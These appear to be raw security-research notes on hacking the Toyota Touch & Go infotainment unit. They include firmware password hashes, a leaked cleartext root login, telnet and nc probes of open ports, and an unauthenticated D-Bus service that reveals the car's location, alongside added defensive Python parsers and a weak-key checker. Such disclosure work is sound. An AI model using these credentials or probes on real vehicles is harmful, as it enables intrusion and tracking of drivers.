Presentation slides from 2012: HappyHackingToyotaTouchAndGo.pdf
Hacking Toyota Touch & Go
New Toyotas can be connected to the Internet via Bluetooth. We wanted to know what is going on under the hood. You can find our raw notes here; they are for fellow hackers to continue the work.
Yes, we found vulnerabilities similar to the ones Charlie Miller and Chris Valasek found in the famous Jeep #CarHack. You can find their great research here: http://illmatics.com/Remote%20Car%20Hacking.pdf
Instructions from mytoyota.com
Free and paid content can be added to your account on the download services section of this portal. To ensure you install the content correctly onto your Toyota Touch & Go follow the steps below:
- Create a fingerprint of your Toyota Touch & Go using your USB stick (see guide)
- Download and install the Toyota Touch & Go Toolbox on your PC (download page)
- Connect the USB stick to your PC and launch your toolbox
- Login to your Toyota Touch & Go Toolbox and follow the instructions to download and install your content (see guide)
There is developer documentation about the QNX platform, e.g.:
http://www.qnx.com/developers/docs/6.4.1/composition_manager/dev_guide/configuring.html
http://support7.qnx.com/download/download/20982/590.39_65_Quickstart_Guide_P6.pdf
http://haxor.fi/2012/10/how-the-firmware-updates-work-on-toyota-touch-go/
Discussion forum about T&G http://www.vleeuwen.net/forum/viewforum.php?f=3&sid=e1ac5c9c49fddcb5d1ed76f9ac395900
Firmware
Firmware image: http://download.naviextras.com/content/!application/Toyota/OS/EU_Low/2011_12_08/swdl.iso
/usr/share/swdl.bin looks interesting. Strings findings:
    root:C9v0PdmoRiQ9.:1303406650
    toyota:QQkI3zYSmefdc

    $ file usr/share/V850/teb.bin
    usr/share/V850/teb.bin: 8086 relocatable (Microsoft)
usr/share/scripts/install.sh
QNX CAR Application Platform http://www.qnx.com/products/qnxcar/
Open services on QNX machine
- 23/tcp open telnet Openwall GNU/*/Linux telnetd
- 851/tcp open unknown
- 2021/tcp open servexec?
- 6020/tcp open unknown
- 6667/tcp open irc?
- 51500/tcp open ????
23 telnet
    $ telnet 172.20.10.6
    Trying 172.20.10.6...
    Connected to 172.20.10.6.
    Escape character is '^]'.

    QNX Neutrino (localhost) (ttyp0)

    login:
The accounts are now publicly known: Harman were kind enough to share the account information with everybody on their scrum wiki.
    login: root
    password: Mc!AsR3
851 Logdump?
    $ nc 192.168.2.6 851
    åGåLåLMar 18 14:56:00.050 5 00008 300 io-winmgr: starting up...
    Mar 18 14:56:00.177 5 10000 00 Service com.harman.service.ToyotaMGR just appeared at time 7.200323 seconds
    Mar 18 14:56:00.276 5 00008 300 io-winmgr: attached to iow-keyboard
    Mar 18 14:56:00.335 5 10000 00 pid 340019: Binary persistence for 'TM' is empty.
    Mar 18 14:56:00.500 5 00008 300 io-winmgr: no mouse
    Mar 18 14:56:00.507 5 00008 300 io-winmgr: attached to iow-touch
    Mar 18 14:56:00.697 5 00008 300 io-winmgr: no control
    Mar 18 14:56:00.840 5 10000 00 pid 458795: Binary persistence for 'HMI' is empty.
/FromLogUSBStickWithFancyFiles
2021
    $ nc 172.20.10.6 2021
    <GCF 000163 TS_10_0001081726>CTRL INFO IOFSMediaBT MSG='iofsmediabt_devctl(1617) DCMD_MEDIA_PLAYBACK_STATUS playstate: 2, speed: 0, playstate_flags: 0, trk_curr: 0, trk_total: 27, skipped: 2';
    <GCF 000163 TS_10_0001082328>CTRL INFO IOFSMediaBT MSG='iofsmediabt_devctl(1617) DCMD_MEDIA_PLAYBACK_STATUS playstate: 2, speed: 0, playstate_flags: 0, trk_curr: 0, trk_total: 27, skipped: 2';
    <GCF 000082 TS_10_0001082381>CALL Bluephone:507 BSS_HFP_Write handle=1 codec=CODEC_HEX data='41542B434C43430D';
    <GCF 000055 TS_10_0001082382>CTRL INFO BSSService MSG='received event ET_DATA_SENT';
    <GCF 000056 TS_10_0001082383>RESP Bluephone:507 BSS_HFP_Write error=WRITE_ERROR_NONE;
    <GCF 000059 TS_10_0001082417>CTRL INFO BSSService MSG='received event ET_DATA_RECEIVED';
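The 2021/tcp stream is a structured diagnostic log, and a forensic reviewer will want it machine-readable rather than eyeballed. The parser below is an added example, not code from the notes: it splits records of the shape shown above (I call them GCF records after their tag; the field names are read off the capture, not from any vendor documentation), and decodes CODEC_HEX payloads, which turn out to be the AT commands the head unit writes to the paired phone over the Hands-Free link. The sample is constructed from the records above.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: four records in the shape of the 2021/tcp capture above
# (records are separated by "; " on the wire, so they arrive as one long line).
SAMPLE = (
    "<GCF 000163 TS_10_0001082328>CTRL INFO IOFSMediaBT MSG='iofsmediabt_devctl(1617) "
    "DCMD_MEDIA_PLAYBACK_STATUS playstate: 2, speed: 0, playstate_flags: 0, trk_curr: 0, "
    "trk_total: 27, skipped: 2'; "
    "<GCF 000082 TS_10_0001082381>CALL Bluephone:507 BSS_HFP_Write handle=1 "
    "codec=CODEC_HEX data='41542B434C43430D'; "
    "<GCF 000055 TS_10_0001082382>CTRL INFO BSSService MSG='received event ET_DATA_SENT'; "
    "<GCF 000056 TS_10_0001082383>RESP Bluephone:507 BSS_HFP_Write error=WRITE_ERROR_NONE;"
)

# <GCF seq TS_clock_tick>KIND body;  the body runs to the ';' that precedes the next record
RECORD = re.compile(r"<GCF (\d+) TS_(\d+)_(\d+)>(\w+) (.*?);(?=\s*(?:<GCF|$))", re.S)
# key=value pairs; a value is either single-quoted (may contain spaces) or a bare token
FIELD = re.compile(r"(\w+)=(?:'([^']*)'|(\S+))")

def parse_gcf(stream: str) -> List[Dict]:
    """Split the stream into records: seq, clock id, tick, kind, head tokens and fields."""
    records = []
    for m in RECORD.finditer(stream):
        seq, clock, tick, kind, body = m.groups()
        head = []
        for tok in body.split():
            if "=" in tok:
                break
            head.append(tok)  # CTRL: level, component / CALL,RESP: component:line, function
        fields = {k: quoted or bare for k, quoted, bare in FIELD.findall(body)}
        records.append({"seq": int(seq), "clock": clock, "tick": int(tick),
                        "kind": kind, "head": head, "fields": fields})
    return records

def decode_hex_payload(rec: Dict) -> Optional[str]:
    """CODEC_HEX data fields carry the raw bytes sent to the phone; decode them as text."""
    f = rec["fields"]
    if f.get("codec") != "CODEC_HEX" or "data" not in f:
        return None
    return bytes.fromhex(f["data"]).decode("ascii", "replace").rstrip("\r\n")

def hfp_commands(stream: str) -> List[str]:
    """Every AT command the head unit wrote to the Hands-Free link, in order."""
    return [decode_hex_payload(r) for r in parse_gcf(stream)
            if r["kind"] == "CALL" and r["head"][-1:] == ["BSS_HFP_Write"]
            and decode_hex_payload(r) is not None]
```

On the sample, hfp_commands returns ['AT+CLCC'], the standard "list current calls" query, so the unauthenticated log port exposes the phone's call state in near real time.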
6020
    $ nc 192.168.2.6 6020
    :CTRL CNFG GCFROUTER MODE=STANDARD;
It might be the serial port of the GPS navigation device: http://www.digital-eliteboard.com/showthread.php?88164-Supportthread_1-Becker-Z099-Z1XX-Z2XX-Z302/page52&p=953416&viewfull=1#post953416
6667
If I connect to this port with telnet it says ERROR "Unknown command", e.g.:
    $ telnet 192.168.2.4 6667
    Trying 192.168.2.4...
    Connected to 192.168.2.4.
    Escape character is '^]'.
    foo
    ERROR "Unknown command"
With nc there is nothing.
Clues
- Might be D-Bus related:
    unix:path=/tmp/dbus-MNzOp3X3nV,guid=e21d288fe52bc59a6d8e19c04bbccfd0;tcp:host=localhost,port=6667,family=ipv4,guid=1b1a12b5fa8e657b3fd2d05b4bbccfd0
http://community.qnx.com/sf/discussion/do/listPosts/projects.ide/discussion.ide.topc13034
Bug reporter was: Glenn Schmottlach
He has done this before (from his LinkedIn profile): "D-Bus Platform Support - Ported and adapted D-Bus to QNX where it serves as the primary application IPC mechanism for mid-tier head unit designs. Includes developing an alternative JSON based messaging protocol on top of D-Bus." http://www.linkedin.com/pub/glenn-schmottlach/4/396/a5
http://dbus.freedesktop.org/doc/dbus-specification.html#transports-exec
D-bus tests
Updated 2014-12: so it really was D-Bus without any kind of authentication. You can get the car's coordinates, play any Flash content from the Internet on the screen, etc. You really want to keep your car disconnected from the Internet. We reported this to Toyota (2013-02) and they kindly answered (2013-05).
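The address string found in the clues above is the whole story in one line: a D-Bus server listening on a unix socket and on TCP port 6667. As an added example (not part of the notes), the Python below parses that string with the address grammar from the D-Bus specification linked above and lists which entries are reachable over IP; the audit text is my reading of the spec's own warning that the tcp transport without an additional authentication mechanism is unsecure, and of the ANONYMOUS mechanism it defines. It assumes nothing about the car beyond that one string.

```python
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Bus address quoted in the notes above; the second entry is what made port 6667 answer.
CAR_ADDRESS = ("unix:path=/tmp/dbus-MNzOp3X3nV,guid=e21d288fe52bc59a6d8e19c04bbccfd0;"
               "tcp:host=localhost,port=6667,family=ipv4,guid=1b1a12b5fa8e657b3fd2d05b4bbccfd0")

LOOPBACK = {"localhost", "127.0.0.1", "::1"}
IP_TRANSPORTS = {"tcp", "nonce-tcp"}

def parse_dbus_address(address: str) -> List[Tuple[str, Dict[str, str]]]:
    """Split a D-Bus address into (transport, params) pairs.
    Spec grammar: entries separated by ';', each 'transport:key=value,key=value',
    values %-escaped; whitespace is stripped to survive copy-paste damage ('guid= ...')."""
    servers = []
    for entry in address.split(";"):
        if not entry.strip():
            continue
        transport, _, params = entry.partition(":")
        kv = {}
        for item in params.split(","):
            key, _, value = item.partition("=")
            kv[key.strip()] = unquote(value.strip())
        servers.append((transport.strip(), kv))
    return servers

def ip_listeners(address: str) -> List[Tuple[str, int]]:
    """(host, port) for every entry that speaks over IP rather than a local socket."""
    out = []
    for transport, kv in parse_dbus_address(address):
        if transport in IP_TRANSPORTS:
            out.append((kv.get("bind", kv.get("host", "")), int(kv.get("port", "0"))))
    return out

def audit(address: str) -> List[str]:
    """Reviewer's findings: D-Bus over TCP is plaintext and the spec calls it unsecure without
    extra authentication, so an IP listener needs loopback binding and a bus policy that
    refuses ANONYMOUS; a unix socket is protected by filesystem permissions instead."""
    findings = []
    for transport, kv in parse_dbus_address(address):
        if transport in IP_TRANSPORTS:
            host, port = kv.get("bind", kv.get("host", "")), kv.get("port", "?")
            scope = "loopback only" if host in LOOPBACK else "reachable from the network"
            findings.append("%s on %s:%s (%s): plaintext IPC, verify the bus config denies "
                            "ANONYMOUS and requires DBUS_COOKIE_SHA1" % (transport, host, port, scope))
        elif transport == "unix":
            findings.append("unix socket %s: local processes only, guard with file permissions"
                            % kv.get("path", kv.get("abstract", "?")))
    return findings
```

The host in the address says localhost, yet the port answered on the car's Wi-Fi address, so the advertised address must be checked against what the daemon actually binds (netstat or a scan from another host), not taken on trust.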
51500
After I send anything to the socket, the connection closes.
Bluetooth
- Services:
  - AVRCP Remote Control
  - Advanced Audio
  - Hands-Free unit
  - Personal Ad-hoc User Service
- Device Service Class 0x3b0
Key validation
    # cat apps-eu.pub
    -----BEGIN PUBLIC KEY-----
    MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALj9KV9l/wdmD5s9ZUrTWUpK6Gj8OxFj
    d7ErOfvz+63s8kI9WPvU3IFhtHQZKdn8arY6D2v9LzOV+k2v/t827FMCAwEAAQ==
    -----END PUBLIC KEY-----

    % openssl rsa -pubin -in ./fuu.pub -text
    Modulus (512 bit):
        00:b8:fd:29:5f:65:ff:07:66:0f:9b:3d:65:4a:d3:
        59:4a:4a:e8:68:fc:3b:11:63:77:b1:2b:39:fb:f3:
        fb:ad:ec:f2:42:3d:58:fb:d4:dc:81:61:b4:74:19:
        29:d9:fc:6a:b6:3a:0f:6b:fd:2f:33:95:fa:4d:af:
        fe:df:36:ec:53
    Exponent: 65537 (0x10001)
    writing RSA key
    -----BEGIN PUBLIC KEY-----
    MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALj9KV9l/wdmD5s9ZUrTWUpK6Gj8OxFj
    d7ErOfvz+63s8kI9WPvU3IFhtHQZKdn8arY6D2v9LzOV+k2v/t827FMCAwEAAQ==
    -----END PUBLIC KEY-----
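The dump above shows the content-validation key is a 512-bit RSA modulus. As an added example (not from the notes), this stdlib-only Python reads the apps-eu.pub PEM exactly as printed, walks the DER SubjectPublicKeyInfo by hand and reports modulus size and exponent against a 2048-bit floor. A 512-bit RSA modulus has been publicly factorable since RSA-155 fell in 1999, so whatever the installer's validation code does, a key this size gives the update channel little protection against forged content.

```python
import base64

# Key exactly as printed on the page (apps-eu.pub); the PEM body is the page's own value.
APPS_EU_PUB = """-----BEGIN PUBLIC KEY-----
MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALj9KV9l/wdmD5s9ZUrTWUpK6Gj8OxFj
d7ErOfvz+63s8kI9WPvU3IFhtHQZKdn8arY6D2v9LzOV+k2v/t827FMCAwEAAQ==
-----END PUBLIC KEY-----"""

RSA_ENCRYPTION_OID = bytes.fromhex("2a864886f70d010101")  # 1.2.840.113549.1.1.1

def read_tlv(buf: bytes, pos: int):
    """Read one DER tag-length-value starting at pos; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low 7 bits give the count of length bytes that follow
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def rsa_public_key_params(pem: str):
    """Return (modulus_bits, public_exponent) from a PEM SubjectPublicKeyInfo."""
    body = "".join(line for line in pem.splitlines() if not line.startswith("-----"))
    der = base64.b64decode(body)
    tag, spki, _ = read_tlv(der, 0)              # SEQUENCE SubjectPublicKeyInfo
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    _, alg, pos = read_tlv(spki, 0)              # SEQUENCE AlgorithmIdentifier
    _, oid, _ = read_tlv(alg, 0)                 # OBJECT IDENTIFIER
    if oid != RSA_ENCRYPTION_OID:
        raise ValueError("not an rsaEncryption key")
    tag, bitstr, _ = read_tlv(spki, pos)         # BIT STRING subjectPublicKey
    if tag != 0x03 or bitstr[0] != 0:
        raise ValueError("unexpected BIT STRING")
    _, rsakey, _ = read_tlv(bitstr, 1)           # SEQUENCE RSAPublicKey { n, e }
    _, n_bytes, pos = read_tlv(rsakey, 0)        # INTEGER modulus (leading 00 keeps it positive)
    _, e_bytes, _ = read_tlv(rsakey, pos)        # INTEGER publicExponent
    n = int.from_bytes(n_bytes, "big")
    return n.bit_length(), int.from_bytes(e_bytes, "big")

def assess_key(pem: str, minimum_bits: int = 2048) -> str:
    """Verdict a firmware-validation reviewer would record for this key."""
    bits, e = rsa_public_key_params(pem)
    status = "OK" if bits >= minimum_bits else "WEAK"
    return "RSA-%d e=%d: %s (minimum %d)" % (bits, e, status, minimum_bits)

if __name__ == "__main__":
    print(assess_key(APPS_EU_PUB))  # RSA-512 e=65537: WEAK (minimum 2048)
```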
Links
https://www.jkry.org/ouluhack/Toyota%20Touch%20%26%20Go
http://haxor.fi/2012/10/how-the-firmware-updates-work-on-toyota-touch-go/
http://muistio.tieke.fi/itB9pWrKmR
http://www.toyota.co.uk/cgi-bin/toyota/bv/frame_start.jsp?id=Nav_TouchGo
Firmware update:
http://download.naviextras.com/content/!application/Toyota/OS/EU_Low/2011_12_08/swdl.iso
http://www.itviikko.fi/uutiset/2012/03/06/fordin-vastaus-ongelmiin-muistitikku/201224651/7
- Description: Hacking the head unit of a Toyota Avensis (a Toyota model sold in Europe)